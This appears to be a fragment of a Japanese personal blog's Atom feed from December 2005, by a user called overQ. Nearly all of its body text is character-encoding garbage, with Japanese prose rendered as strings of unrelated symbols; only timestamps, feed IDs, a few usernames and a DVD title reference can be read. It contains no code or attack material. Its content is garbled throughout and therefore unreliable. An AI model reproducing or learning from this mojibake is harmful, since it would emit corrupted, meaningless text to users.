    -₪«₪´₪ע²¼₪²₪ֶַד₪₪×₪ֻ¹װ₪¯₪×ל₪µ₪ף₪¿₪ֱ¡£ֶ¦ֹו²°₪־¥י¥ֳ¥ׁ¡£
    -µ¡³£ּ‎₪־ְק₪₪¿ֹד₪־¹©°קֹ‏¡£
    -±״ֱ°₪־¹ג²ֽ²¼₪ֻ₪ֿ¾ֶ₪­ִ»₪־²°ֲז¡£
    -ֳ¡₪₪₪ֶ₪₪×₪¹¿¿¶ץ´ֹ₪־¥ֶ¥ל¥׃¡£
    -ֵ´ֹ₪־ֳײ₪₪₪ֶ₪¢₪כ¶ץ₪­ֳֿ¡£

    - -

    ¹©¾ל₪עֳז¿´₪ֻ¡¢₪½₪³₪ֶַ¯₪¯¿ֽ¡¹₪־ְ¸³ט¶ץ´ײ₪ָ₪·₪ֶ¡¢³¹₪ֿ½׀ֽט₪ֶ₪₪₪¿¡£

    - -

    ÷אּ₪ֻ₪־₪ֳ₪ֶֽ·₪ײ»ׂ₪ֹ₪ג₪¿₪ֱַ״·₪ֲֻח¹©¾ל

    - -

    ¾¼ֲֿ¡ײְֱ₪ן₪ל₪¿³¹¡׳₪ֿ¡¢÷אֳּײ₪­¾ל₪ַֽ·₪ײ»ׂ₪ֹ₪ג₪¿₪ֱ₪־»ׁ₪«₪י»ֿ₪₪ך¡¢ַ״·₪ֻ₪ֲֿח₪­₪¹©¾ל₪¬¸«₪¨₪כ¡£¼×₪ע₪¹₪₪»₪׀¹©¾ל₪־²»¡£
    -₪½₪·₪ֶ¡¢¥ׁ¥₪¥ם¥ֳ¥ָ₪ְ₪ֳ₪¿ֹד₪¬»א₪ֻ¡¢¿ֽ₪¬₪₪₪ֳ₪ׁ₪₪½¸₪₪ֳ₪¿ֱע¼°¥·¡¼¥ף₪ֲֻ³₪₪₪ֶ₪₪₪­₪₪¹¡£

    - -

    ַׁ¹©¾ל¿ְ®¡ײְֱ₪ן₪ל₪₪₪³¹¡׳₪ֿ¡¢¥¥ף¥·¥ח¥ף₪ְ₪«¥¥ֶ¥כ₪ְ₪«₪־·תֳ¸½¾ל₪ע±ַ₪·₪¿₪¢₪ָ¡»׀»ץ¡©¡ֻ¡¢±«ֿ³₪ך₪·₪ֶ₪½₪¦₪ַׁ¹©¾ל¡¡©¡ֻ₪«₪י»ֿ₪₪כ¡£×₪¬₪₪¯₪ֶ¡¢₪¹₪ֳ₪«₪י₪«₪ף¡£¼×₪ע₪¹₪₪»₪׀¡¢¸₪₪ֻׂד₪¨₪י₪ל₪כּמ־ַֹ­₪־ְ¼¡£
    -₪×»₪־¥·¡¼¥ף₪ַ₪ֿ¿ֽ±ֶ₪ֿ¸«₪¨₪÷¡¢₪¿₪ְ₪×·׀₪־²»₪¬־®₪לֲ³₪±₪כ¡¹ג־נ²½¼ׂ²ס₪־¾ִ§¡©¡ֻ¡£

    - -

    ₪³₪־₪ָ₪³₪ם¡¢¾¼ֲֿ¥ײ¡¼¥א₪ָ₪₪₪ן₪ל¡¢±ַ²ט¡ײALWAYS »°ֳתּ₪־ֽ¼ֶ¡׳₪ג¹¥ִ´₪ְ₪½₪¦₪ַ₪¹¡£¡ײ¥×¥ָ¥ִכ¹ס₪־µױ½±¡׳₪ג₪¢₪ֳ₪¿¡£
    -₪½₪³₪ַ₪₪₪ן₪ל₪כ¡ײ¾¼ֲֿ¡׳₪ָ₪ֿ¡¢ְן¸ו₪־¾¼ֲֿ£³£°ַ¯ֲו£´£°ַ¯ֲו₪־₪³₪ָ¡£ֶֻ₪¬¡¢¼«ֶ°¼ײ¡¦µ¡³£¡¦ֵֵ²½ְ½ֹ₪₪ְֹ₪³¦¾¦ֹ₪עְ¸₪½׀₪·ֲ³₪±¡¢ֻ­₪«₪ֻ₪₪ֳ₪ֶ₪₪₪ֳ₪¿»‏ֲו¡£ֶ¯₪±₪׀ֶ¯₪¯₪₪ֹ¡¢¼ׂ²ס₪ֻֿ­₪«₪ֻ₪₪ֳ₪¿¡£¢ּ₪ֽט¡׳₪¬»׳₪₪₪ֿ₪»₪י₪ל₪¿¡£
    -¿ְ®₪־÷£¡¢₪½₪־»‏ֲו₪¬²₪«₪·₪₪ל₪ֶ₪₪₪₪¹¡£(₪³₪־²¸ֵ₪ֿ¡¢¸־₪־₪₪₪₪ג₪־₪ַ₪ֿ₪₪₪¡£
    -¸½÷¡¢ֶֻ₪־¥¥ֽ¡¼₪ֿ³₪³°₪ֻ־®½׀₪·₪ֶ₪₪₪כ¡£¹סֶג₪ֵֻך»ס₪·₪ֶ₪גֽ­¸ת₪ֻµ¡ַ½₪·₪₪₪₪«₪י¡־ד₪¨₪׀¥ְ¥א·תְ¡ֻ¡£₪½₪·₪ֶ¡¢ֵך»ס₪₪­¾ל½ך₪ֻ³ֲָחְ¸»÷₪ֿ₪₪₪¡£¹©¾ל₪ֿ÷£₪ַ₪ֳֿז¹ס₪ה¥₪¥ף¥ֹ₪ֻ₪¢₪כ¡£
    -¹סֶג₪־ֹ₪ֿ₪¿₪ײ₪ף¸÷¾¯₪·₪ֶ₪₪₪ֶ¡¢₪½₪־¼ט₪ך¹ח₪₪₪ע₪·₪ֶ₪₪₪כ¿¿₪ֳ÷ֳַז¡£
    -₪ג₪־₪ֵ₪¯₪ך₪־»ֵ»צ₪הֿ«ֶ¯¼װ₪־ֿ¢ֲ׃₪ֿ¾ֳַּ¡ֽ‎·ֿ־¥₪ל¡¢ֱָ¹ח·ֱ³¼²½¡ֻ¡£
    -¹©°ק₪ֻ₪₪כ₪ֿ₪÷₪־¿ֽ¡¹₪ֿ¡¢¹װ‎₪ע¼÷₪ֳ₪ֶ₪¢₪ײ₪ל₪ֶ₪₪₪כ¡¥ך¥¹¥ָ¥י¡¢¥ֻ¡¼¥ָ¡ֻ¡£
    -³₪³°ֵך»ס₪¹₪כ÷ג»÷₪־₪₪₪¿ֽ₪ֻ¡¢÷£»ִ₪µ₪ל₪¿»ֵ»צ₪ֿ¡¢¼ח₪ֻ¥µ¡¼¥׃¥¹¶ָ¡£
    -µ¡³£₪ְֻ₪¹₪כ₪־₪ְֶֿ°ױ₪ַ₪ג¡¢¿ֽ₪ְֻ₪¹₪כ₪־₪ֿ¡¢₪ְ₪₪·₪ֶ₪₪₪כ₪ט₪¦₪ַ¡¢µ₪₪¬°­₪₪¡¢₪ָ»׳₪¦₪ט₪¦₪µ₪¼ֱ₪־¿ֽ¡¹¡£
    -¥³¥¥ו¥ֻ¥±¡¼¥·¥ח¥ף־ֿ₪¬₪₪₪₪ָ₪₪₪ן₪ל¡¢°ת₪­₪³₪ג₪כ¡£²¿₪ע₪¹₪₪­₪«₪ן₪«₪י₪÷¡¢¡ײ₪ָ₪ך₪¢₪¨₪÷ָָ÷ב¡׳₪ָ₪₪₪¦₪ט₪¦₪ָָ÷ב¼װ₪¬½׀¸½¡£
    -¥µ¡¼¥׃¥¹¶ָ₪ֻ½¾»צ₪·₪ֶ₪₪ל₪׀¡¢¿¦¶ָ·±־‎₪ָ¾־₪·₪ֶ¡ײ₪×µֽֽׂ₪ֻ₪ֿ¥¸¥ד¥¹¥ָ¡¦¥»¥₪¡¦¥₪¥¨¥¹¡׳₪ֵָ־ל÷¬ְ­₪עֳ¡₪­¹‏₪₪ל₪כ¡£µׂ₪ּֿµֽ‎ֶסֲך¸ְ₪₪₪¿₪₪ֲך¡£¥µ¡¼¥׀¥ף¥ָ¡£¸‎ֵת₪¨₪·₪ט₪¦₪ג₪־₪₪י¡¢¡ײ₪×¶ג₪ֿ§₪ֳ₪ֶ₪כ₪ף₪ְ₪«₪י¡׳¡£
    -¥ם¡¼¥ף₪·₪ֶ¡¢־®¹װ₪·₪ֶ₪₪₪כ¥א¥ְ₪₪ג₪־₪עַד₪₪¡¢ּ₪ֽט₪־ֲִ¶ג₪ג₪¹₪ַ₪ֳֻ¥₪ן₪ל₪ֶ₪₪₪כ¡£¢₪₪₪»₪ֻ¡¢¼«¬₪¬µׂ₪ֻ₪₪ֳ₪¿₪ָ₪­₪ֿ¡¢ּµֽ‎ֶסֲך¸ְ₪₪₪¿₪₪ֲךײ₪·¡£
    -£±ֶ£³£°£°±₪־¿©ָס₪ַ¡¢¥¹¡¼¥ׁ¡¼¥¹¥¿¡¼₪ָ₪₪₪¦ץ₪¯₪¸₪ט₪ך³־־¨₪־ִד₪₪ּ´₪עּ»״₪¹¼ד¼װ₪¿₪ֱ¡£₪ֹ₪¦₪¹₪כ°¦¥ױ¥כ¡£
    -¡ִ₪ָ¡¢₪₪₪ִ₪ג₪ט₪ךֲחּ₪ָֻב´ׁ₪·₪ֶ₪₪₪·₪¿( ¡¨¡­§¥¡®)

    - -

    ₪×¼ך₪ֶ₪ִ₪₪₪₪ַ¡¢₪₪µ¢₪ם₪¦¡£
    -¥«¥י¥¹₪ָ₪₪₪ֳ₪·₪ח₪ֻ¡¢µ¢₪ך₪₪·₪ח₪¦¡£

    - -

    ²בµמ₪ֻ₪×₪₪₪ֶ₪ּֿ₪ֽט₪ֻ₪¢₪כ₪ָ¿®₪¸₪י₪ל¡¢ּ₪ֽט₪ֻ₪×₪₪₪ֶ₪ֿ²בµמ₪ֻ₪¢₪ֳ₪¿₪ָ¸ֶ₪׀₪ל₪כ¡ײ₪׸₪₪₪־¿®ֽך¡׳¡£
    -¾¼ֲֿ₪ָ¿ְ®₪־÷מֹ₪¬¡¢¡ײֲ¸÷₪·ְֶ₪₪₪₪ג₪־¡׳₪ע₪ב₪°₪ֳ₪ֶ¡¢´סּ¯₪ֻ¥כ¡¼¥׳₪·₪₪¹¡£

    - -

    ¢£¥¦¥כ¥ָ¥י¥¥ף¥¥ֳ¥¯¥¹¡¡ֲט£²£´ֳֿ¡ײְֱ₪ן₪ל₪₪₪³¹¡׳
    -ֱקֶ¡§¿ְ®£±£·ַ¯£±£²·מ£±£°ֶ
    -´ִֶֶ¡§¼ֱֲך» ¾¼ֽ÷
    -ֳֶµ»´ִֶֶ¡§µֳֶֿ ֽ÷°ל
    -µ׃ֻ¡§¾®־׃ ֽ÷¼¡
    -±ֳ«¥׳¥ם/£ֳ£ֲ£ֳ £²£°£°£µַ¯
    -¡¿£±¡¦£²¡¦£³¡¦£´¡¦£¶¡¦£¹¡¢₪½₪־ֲ¾¡ֻ

    - -

    ¢£¥¦¥כ¥ָ¥י¥»¥ײ¥ף¡¡ֲט£¸ֳֿ¡ײְֱ₪ן₪ל₪¿³¹¡׳
    -±ֶַ¡¦¾¼ֲֿ42ַ¯11·מ19ֶ
    -´ִֶֶ¡¦¼ֱֲך»¾¼ֽ÷
    -µ׃ֻ¡¦¶ג¾כֵ¯ֹ׳
    -ֳֶ¼לµ»½ׁ¡¦ֲחּ½
    -±ֳ«¥׳¥ם/£װ£ֲ£׃ £±£¹£¶£·ַ¯
    -¡¿£µ¡¦£·¡¦£¸¡ֻ

    - -

    ¥¦¥כ¥ָ¥י¥¥ף¥¥ֳ¥¯¥¹(2)DVD ¥¦¥כ¥ָ¥י¥»¥ײ¥ף Vol.2±¢ז־י»¾ֳז¸ר¸¸ֻ

    ]]> -
    -
    - - µ¨ְב₪־ׁ₪ן₪ךּ - - 2005-12-11T13:20:13Z - 2005-12-11T22:20:13+09:00 - tag:www.overcube.com,2005:/blog//2.672 - 2005-12-11T13:20:13Z - ÷£ַ¯₪ֿ´¨₪₪₪ַ₪¹¡£ ְט½µ¡¢µ‏ֵװ»װֶג₪ֱֿב₪¯₪ג½יְד₪ַ₪·₪¿¡£₪½₪־ֶףֶ¸ו¡¢ָז±ֳ₪ע¼ּ₪·₪¿₪־₪¬¡¢₪³₪־¼ּ¿¿¡£ ₪¢₪כ¹ג₪µ₪ע¶­₪ֻ¡¢½©₪ֵָ₪־ְ₪לּ₪¬¡¢₪¯₪ֳ₪­₪ך₪ָ¡£ְד₪ָ¹ָֽױ₪¬ְן₪ֳ₪ֶ₪₪₪₪¹¡£ֵ¾­·³₪־ֱ°ְ‏´נֳֿ₪¬¡¢₪ג₪¦₪½₪³₪₪ַֽט₪ֶ₪כ¡£ ֶ±ֶ¡¢´הֱׂ₪ֿ₪¹₪ַ₪ֻ¾­·³₪־·³ּח₪ֻ²¼₪ך¡¢ְד¥ְ¥כ¥₪¬₪¢₪ֱ₪³₪ֱ₪ֻ¡£ ½₪³״±¡₪₪ֲֹֻּחֿ©°ֻּ₪־ֳֿ₪ג¡¢´ײ₪ג₪₪¯´ֽמ₪·₪½₪¦₪ַ₪¹¡£ ÷£ַ¯₪־ֵ₪ִֿ¹₪½₪¦₪ְ¡£¡£... - - overQ - - - - - - ָז±ֳ¡¢½יְד

    - -

    ÷£ַ¯₪ֿ´¨₪₪₪ַ₪¹¡£
    -ְט½µ¡¢µ‏ֵװ»װֶג₪ֱֿב₪¯₪ג½יְד₪ַ₪·₪¿¡£₪½₪־ֶףֶ¸ו¡¢ָז±ֳ₪ע¼ּ₪·₪¿₪־₪¬¡¢₪³₪־¼ּ¿¿¡£

    - -

    ₪¢₪כ¹ג₪µ₪ע¶­₪ֻ¡¢½©₪ֵָ₪־ְ₪לּ₪¬¡¢₪¯₪ֳ₪­₪ך₪ָ¡£ְד₪ָ¹ָֽױ₪¬ְן₪ֳ₪ֶ₪₪₪₪¹¡£ֵ¾­·³₪־ֱ°ְ‏´נֳֿ₪¬¡¢₪ג₪¦₪½₪³₪₪ַֽט₪ֶ₪כ¡£

    - -

    ֶ±ֶ¡¢´הֱׂ₪ֿ₪¹₪ַ₪ֻ¾­·³₪־·³ּח₪ֻ²¼₪ך¡¢ְד¥ְ¥כ¥₪¬₪¢₪ֱ₪³₪ֱ₪ֻ¡£
    -½₪³״±¡₪₪ֲֹֻּחֿ©°ֻּ₪־ֳֿ₪ג¡¢´ײ₪ג₪₪¯´ֽמ₪·₪½₪¦₪ַ₪¹¡£

    - -

    ÷£ַ¯₪־ֵ₪ִֿ¹₪½₪¦₪ְ¡£¡£

    ]]> - -
    -
    - - ¿¼ִ₪־ֽ‎ֽ³ - - 2005-12-09T13:12:29Z - 2005-12-09T22:12:29+09:00 - tag:www.overcube.com,2005:/blog//2.671 - 2005-12-09T13:12:29Z - ÷£¡¢¥­¡¼¥¡¼¥ֹ₪עֳ¡₪¯¡¢₪½₪־»״ְט₪¬¡¢ִֻ₪₪¡£ ₪½₪־¸¶°ר₪ֿ¡¢¿¼ִ¡£ ₪₪¼¡¢¿¼ִ₪·₪ֶ₪·₪₪ֳ₪¿₪«¡ִ₪ָ₪₪₪¨₪׀¡¢₪½₪ל₪ֿ¡¢÷ַ¶בֶֹ₪ף₪ַ₪כ¡ײְµֻ¡´דֲ¢¡׳₪־¡¢₪³₪־¸¾ֿ₪ֻֽ³ֽט₪¹₪כ₪־₪ַ₪¹¡£ ½½»״₪־ִ₪עְ₪כ₪₪·¡£½½»״₪ָ₪₪₪ױ₪ֿ¡¢÷¸±¦₪־ְׁ¼ך₪־»״₪־ִ₪₪ך¡£ֲ­»״₪־ִ¡¢ֶ±₪¸₪¯ְ₪כ₪₪·¡£ ו´₪ֻ₪₪₪ֿ₪¯¡¢ִ₪־ִ¹₪µ₪ג₪·°לַ‏₪׀₪«₪ך₪ֻ₪₪ל₪׀÷ב₪ע₪¦₪כ₪₪ך¡£ ₪·₪«₪¢₪ל₪׀¡¢ִ₪עִ¹₪¯₪¹₪₪«₪י₪÷¡£ִ₪־ִ¹₪­₪ֿ¡¢₪×₪־₪ֵ₪«₪י³°ֶ»₪־ְטם§₪₪ך¡£₪³₪ָ₪µ₪י₪ִ₪ב₪ע₪­₪כ₪₪·¡£ ¡ֶ»¸µ¡ײְµֻ¡´דֲ¢¡׳¡¡ֲט¸½½»ֽ ְצֶ ¡ײ₪³₪ָ₪µ₪י¡¢ִ₪עְ₪כ₪₪·¡׳ ·ד₪·₪₪¸ְֽױ₪ַ₪¹¡£₪³₪ָ₪µ₪י₪ַ₪¹¡£ֶ»¸µ₪ַ₪¹¡£ ₪³₪־¸ו₪ֻ₪ג¡¢¸־»צ₪עֶ§₪₪¨₪ֶ¡¢ִ¹₪₪ִ₪¬₪₪₪«₪ֶֻ»₪ע³°₪ל₪¿¹װ°₪ַ₪¢₪כ₪«¡¢ם¡¹₪ָ½ׂ₪₪י₪ל₪ֶ₪₪₪₪¹¡£ ₪½₪ל₪ֿ₪¢₪¿₪«₪ג¡¢ֵל¸קֳֵֶש¾¯ַ¯±¡₪ֱֻק₪י₪ל₪¿ּנ¿ב¾ז₪ֻ₪¢₪ֶ₪ֶ¡¢ֳ°²¼ֳ¿₪¬₪ט₪»₪¿¡¢ְֶּ₪־₪¿₪ב₪ֻ¡₪½₪־£±¡ֻ¡¢ ¡ײ₪ה₪הֶג³ׁ₪עְֱ₪₪¡¢₪¨₪°₪ך₪³₪א₪ט₪¦₪ֲַֻ₪ִ₪₪·¡׳ ₪ֻ₪גֹ₪ֵ¨₪¹₪כ־הֵ°₪₪כ·ד₪·₪µ¡£ ₪½₪ל₪ַ¡¢ְ₪ֳ₪¿₪ט¡¢₪³₪ָ₪µ₪י¡¢ְ₪ך₪ְֻ₪ֳ₪¿¡¢ִ¡£ ¿¼ִ₪ַ¡¢¥­¡¼¥¡¼¥ֶֹ‏־ֿ₪¹₪כ₪¿₪׃¡¢₪₪₪ֱ₪₪₪ֱִֻ₪₪₪ט¡£ ֶ»¸µ₪ֻ³ו¥ֳ¡× ¡ִ( §ױ)¯!¡¢»׳₪ן₪÷¡¢ֶ»¸µ₪ֻ³ו₪עֶ‏₪ל₪ֶ₪·₪₪ֳ₪¿¡¥¥₪¥¢¥¬¥יֲל´ְ ₪ָ₪ג₪¢₪ל¡¢¡ײְצ¾פ¡׳₪ָ₪₪₪¦¾ֿ₪ַ₪ֿ¡¢₪³₪־¸ו¡¢ּמ¥°¥½₪ע₪·₪¿₪¢₪ָ¡¢₪ֹ₪¦₪·₪¿₪י₪­₪ל₪₪₪ֻ₪ַ₪­₪כ₪«₪ֻ₪ִ₪₪₪ֶ₪ג¡¢»צ÷₪«₪ֻ¸ל₪י₪ל₪ֶ₪₪₪₪¹¡£ ₪ֱ₪ח₪ֳ₪ָ₪ט₪±₪₪₪₪×ְ₪ֳֿ₪ַ₪¹¡£¼«¬₪ַ²¿₪ָ₪«₪·₪₪¹₪ֳ₪ֶ¡£₪ַ₪­₪₪¹₪«₪י¡£©ֲֻ₪¬¥¯¥½¥¥י₪ַ₪¢₪ם₪¦₪ָ₪₪«₪ם₪¦₪ָ¡£ ³ו¥ֳ¡× ֶס²ע₪ֳַ־₪י₪ל₪כְµֻ¡´דֲ¢₪ַ₪¹₪¬¡¢₪³₪ף₪₪־₪ג₪¢₪כ₪ף₪ַ₪¹¡£ ֶ»¸µ₪ֻ³ו¡¥ִ¥ֳ¥³¥¡ֻ₪עֶ‏₪ל₪₪¬₪י¡¢ֶֹ₪ף₪ַ₪₪כ₪־₪ֳ₪ֶ¡¢₪½₪ף₪₪ֱֻµ₪־ֻ¼ֱ₪«₪י־¥₪ל₪ֶ₪₪₪₪־₪ַ₪ֿ₪₪₪₪«¡¢₪ָ₪ג¥·¥ם¥¦¥ָ₪־ֹ₪µֳ־₪י₪÷₪ַ»׳₪ֳ₪¿₪ך₪ג₪·₪₪¹¡£ ©¶µ₪ֳ₪ֶ¡¢°ֻא₪ֳ₪ֶ₪₪₪¦ּµֵֻ₪¥¢¥­¥ף¥ֹ₪¬¡¢¶¯־ץ₪¥ִ¥ֳ¥³¥₪עֶ‏₪ל₪כ₪³₪ָ₪ַ¡¢°ת₪­₪³₪ג₪ך₪¬₪ֱ₪¾®¾ט₪«₪י¡¢ֲח¾ט₪־»ָב₪ֻ½׀₪י₪ל₪¿₪ָ₪₪₪¦ֲֹ־ע₪ע»‎₪ִ₪־₪ְ₪«₪י¡£ ְµֻ¡´דֲ¢ֶ‏ּח¡¢₪×₪¹₪¹₪ב₪־°ל¾ֿ₪ַ₪¹(* ^¡¼) £׀¡¥£׃¡¥¥¸¥ח¡¼¥ה¥ײ¥­₪־¥־¡¼¥¬¡¼¥ְֹןֻ¡₪ֿ¡¢ֱµ₪ְ¡£¡¥¥»¡¦¥ב¥ף¥ֹ¡¼¥µ¡ֻ... - - overQ - - - - life - - ÷£¡¢¥­¡¼¥¡¼¥ֹ₪עֳ¡₪¯¡¢₪½₪־»״ְט₪¬¡¢ִֻ₪₪¡£

    - -

    ₪½₪־¸¶°ר₪ֿ¡¢¿¼ִ¡£
    -₪₪¼¡¢¿¼ִ₪·₪ֶ₪·₪₪ֳ₪¿₪«¡ִ₪ָ₪₪₪¨₪׀¡¢₪½₪ל₪ֿ¡¢÷ַ¶בֶֹ₪ף₪ַ₪כ¡ײְµֻ¡´דֲ¢¡׳₪־¡¢₪³₪־¸¾ֿ₪ֻֽ³ֽט₪¹₪כ₪־₪ַ₪¹¡£
    -

    ½½»״₪־ִ₪עְ₪כ₪₪·¡£½½»״₪ָ₪₪₪ױ₪ֿ¡¢÷¸±¦₪־ְׁ¼ך₪־»״₪־ִ₪₪ך¡£ֲ­»״₪־ִ¡¢ֶ±₪¸₪¯ְ₪כ₪₪·¡£
    -ו´₪ֻ₪₪₪ֿ₪¯¡¢ִ₪־ִ¹₪µ₪ג₪·°לַ‏₪׀₪«₪ך₪ֻ₪₪ל₪׀÷ב₪ע₪¦₪כ₪₪ך¡£
    -₪·₪«₪¢₪ל₪׀¡¢ִ₪עִ¹₪¯₪¹₪₪«₪י₪÷¡£ִ₪־ִ¹₪­₪ֿ¡¢₪×₪־₪ֵ₪«₪י³°ֶ»₪־ְטם§₪₪ך¡£₪³₪ָ₪µ₪י₪ִ₪ב₪ע₪­₪כ₪₪·¡£
    ֶ»¸µ¡ײְµֻ¡´דֲ¢¡׳¡¡ֲט¸½½»ֽ ְצֶ

    - -

    ¡ײ₪³₪ָ₪µ₪י¡¢ִ₪עְ₪כ₪₪·¡׳
    -·ד₪·₪₪¸ְֽױ₪ַ₪¹¡£₪³₪ָ₪µ₪י₪ַ₪¹¡£ֶ»¸µ₪ַ₪¹¡£
    -₪³₪־¸ו₪ֻ₪ג¡¢¸־»צ₪עֶ§₪₪¨₪ֶ¡¢ִ¹₪₪ִ₪¬₪₪₪«₪ֶֻ»₪ע³°₪ל₪¿¹װ°₪ַ₪¢₪כ₪«¡¢ם¡¹₪ָ½ׂ₪₪י₪ל₪ֶ₪₪₪₪¹¡£
    -₪½₪ל₪ֿ₪¢₪¿₪«₪ג¡¢ֵל¸קֳֵֶש¾¯ַ¯±¡₪ֱֻק₪י₪ל₪¿ּנ¿ב¾ז₪ֻ₪¢₪ֶ₪ֶ¡¢ֳ°²¼ֳ¿₪¬₪ט₪»₪¿¡¢ְֶּ₪־₪¿₪ב₪ֻ¡₪½₪־£±¡ֻ¡¢
    -¡ײ₪ה₪הֶג³ׁ₪עְֱ₪₪¡¢₪¨₪°₪ך₪³₪א₪ט₪¦₪ֲַֻ₪ִ₪₪·¡׳
    -₪ֻ₪גֹ₪ֵ¨₪¹₪כ־הֵ°₪₪כ·ד₪·₪µ¡£

    - -

    ₪½₪ל₪ַ¡¢ְ₪ֳ₪¿₪ט¡¢₪³₪ָ₪µ₪י¡¢ְ₪ך₪ְֻ₪ֳ₪¿¡¢ִ¡£
    -¿¼ִ₪ַ¡¢¥­¡¼¥¡¼¥ֶֹ‏־ֿ₪¹₪כ₪¿₪׃¡¢₪₪₪ֱ₪₪₪ֱִֻ₪₪₪ט¡£
    -

    ֶ»¸µ₪ֻ³ו¥ֳ¡×

    - -

    ¡ִ( §ױ)¯!¡¢»׳₪ן₪÷¡¢ֶ»¸µ₪ֻ³ו₪עֶ‏₪ל₪ֶ₪·₪₪ֳ₪¿¡¥¥₪¥¢¥¬¥יֲל´ְ

    - -

    ₪ָ₪ג₪¢₪ל¡¢¡ײְצ¾פ¡׳₪ָ₪₪₪¦¾ֿ₪ַ₪ֿ¡¢₪³₪־¸ו¡¢ּמ¥°¥½₪ע₪·₪¿₪¢₪ָ¡¢₪ֹ₪¦₪·₪¿₪י₪­₪ל₪₪₪ֻ₪ַ₪­₪כ₪«₪ֻ₪ִ₪₪₪ֶ₪ג¡¢»צ÷₪«₪ֻ¸ל₪י₪ל₪ֶ₪₪₪₪¹¡£
    -₪ֱ₪ח₪ֳ₪ָ₪ט₪±₪₪₪₪×ְ₪ֳֿ₪ַ₪¹¡£¼«¬₪ַ²¿₪ָ₪«₪·₪₪¹₪ֳ₪ֶ¡£₪ַ₪­₪₪¹₪«₪י¡£©ֲֻ₪¬¥¯¥½¥¥י₪ַ₪¢₪ם₪¦₪ָ₪₪«₪ם₪¦₪ָ¡£
    -³ו¥ֳ¡×

    - -

    ֶס²ע₪ֳַ־₪י₪ל₪כְµֻ¡´דֲ¢₪ַ₪¹₪¬¡¢₪³₪ף₪₪־₪ג₪¢₪כ₪ף₪ַ₪¹¡£
    -ֶ»¸µ₪ֻ³ו¡¥ִ¥ֳ¥³¥¡ֻ₪עֶ‏₪ל₪₪¬₪י¡¢ֶֹ₪ף₪ַ₪₪כ₪־₪ֳ₪ֶ¡¢₪½₪ף₪₪ֱֻµ₪־ֻ¼ֱ₪«₪י־¥₪ל₪ֶ₪₪₪₪־₪ַ₪ֿ₪₪₪₪«¡¢₪ָ₪ג¥·¥ם¥¦¥ָ₪־ֹ₪µֳ־₪י₪÷₪ַ»׳₪ֳ₪¿₪ך₪ג₪·₪₪¹¡£
    -©¶µ₪ֳ₪ֶ¡¢°ֻא₪ֳ₪ֶ₪₪₪¦ּµֵֻ₪¥¢¥­¥ף¥ֹ₪¬¡¢¶¯־ץ₪¥ִ¥ֳ¥³¥₪עֶ‏₪ל₪כ₪³₪ָ₪ַ¡¢°ת₪­₪³₪ג₪ך₪¬₪ֱ₪¾®¾ט₪«₪י¡¢ֲח¾ט₪־»ָב₪ֻ½׀₪י₪ל₪¿₪ָ₪₪₪¦ֲֹ־ע₪ע»‎₪ִ₪־₪ְ₪«₪י¡£

    - -

    ְµֻ¡´דֲ¢ֶ‏ּח¡¢₪×₪¹₪¹₪ב₪־°ל¾ֿ₪ַ₪¹(* ^¡¼)

    - -

    ְµֻ¡´דֲ¢¡ׂ1¡׃¹ײֳּ¼ׂ³״½ׁ¸¸ֻ

    - -

    £׀¡¥£׃¡¥¥¸¥ח¡¼¥ה¥ײ¥­₪־¥־¡¼¥¬¡¼¥ְֹןֻ¡₪ֿ¡¢ֱµ₪ְ¡£¡¥¥»¡¦¥ב¥ף¥ֹ¡¼¥µ¡ֻ

    ]]> - -
    -
    - - ₪¿₪יֻ19¡ײ¼ֲ₪ֿ¡ִ¡ִ₪³₪ף₪ֻ₪ע»‎₪ֳ₪ֶ₪כ₪ף₪ַ₪¹¡׳ - - 2005-12-06T12:31:11Z - 2005-12-06T21:31:11+09:00 - tag:www.overcube.com,2005:/blog//2.670 - 2005-12-06T12:31:11Z - ₪¿₪יֻ¡¢ֲט£±£¹²ףּ₪ַ₪´₪¶₪₪₪₪¹¡£ ÷£²ף₪ֿ¡¢SukuSukuPu-san₪־mort_a_credit₪µ₪¼ח÷ֵ¡× ₪×ֲך₪ֿ¡¢ ¡ײ¼ֲ₪ֿ¡ִ¡ִ₪³₪ף₪ֻ₪ע»‎₪ֳ₪ֶ₪כ₪ף₪ַ₪¹¡׳ ₪ָ₪₪₪¦₪ן₪±₪ַ¡¢₪³₪ל₪ַ₪´₪¶₪₪₪₪¹¡£ ֻ₪ָ₪₪₪¦₪«¡¢¸«₪ֶ₪־ִּ₪ך¸ֵ¸½ס¡£ ¿ְֶּ¡¡ײֻ²ָ¡׳₪ָ¸ֶ₪ײ₪ט₪¦»״ֶ³₪µ₪ל₪ֶ₪₪₪כ¡ֻ₪־ֲ¢₪«₪יָ¯·¡₪·₪ֶ₪­₪¿₪ג₪־₪ַ¡¢ֲַח₪־ּ₪¬₪¢₪ך₪₪¹¡£₪³₪³₪ֻ¼ּ₪·₪¿₪־₪־¡¢¿פֹ´ַ₪¯₪י₪₪₪־־ּ₪¬₪¢₪ך₪₪¹₪ְ¡£ ₪₪₪ֱ₪׀₪ף¸ֵ₪₪₪ג₪־₪ַ₪ֿ¡¢¸µֿ½¡£ ²¿₪־¸ֵ¸½ס₪«₪ָ₪₪₪¦₪ָ¡¢¸¢ֽר½ס₪ה¾¦ַה₪הּה²°₪ָ₪«₪־µצ²ִ¾₪ָ₪₪₪¦₪־₪«¡¢¾¸₪־־א₪ַ₪¹¡£ ₪₪¼₪ֻ₪½₪־₪ט₪¦₪ג₪־₪¬₪₪₪ֳ₪ׁ₪₪₪¢₪כ₪־₪«¡£... - - overQ - - - - tarai - - ₪¿₪י19a₪¿₪יֻ¡¢ֲט£±£¹²ףּ₪ַ₪´₪¶₪₪₪₪¹¡£
    -÷£²ף₪ֿ¡¢SukuSukuPu-san₪־mort_a_credit₪µ₪¼ח÷ֵ¡×
    -₪×ֲך₪ֿ¡¢
    -

    ¡ײ¼ֲ₪ֿ¡ִ¡ִ₪³₪ף₪ֻ₪ע»‎₪ֳ₪ֶ₪כ₪ף₪ַ₪¹¡׳

    - -

    ₪ָ₪₪₪¦₪ן₪±₪ַ¡¢₪³₪ל₪ַ₪´₪¶₪₪₪₪¹¡£

    - -

    ¸ֵ¸½ס₪½₪־£±

    - -

    ֻ₪ָ₪₪₪¦₪«¡¢¸«₪ֶ₪־ִּ₪ך¸ֵ¸½ס¡£
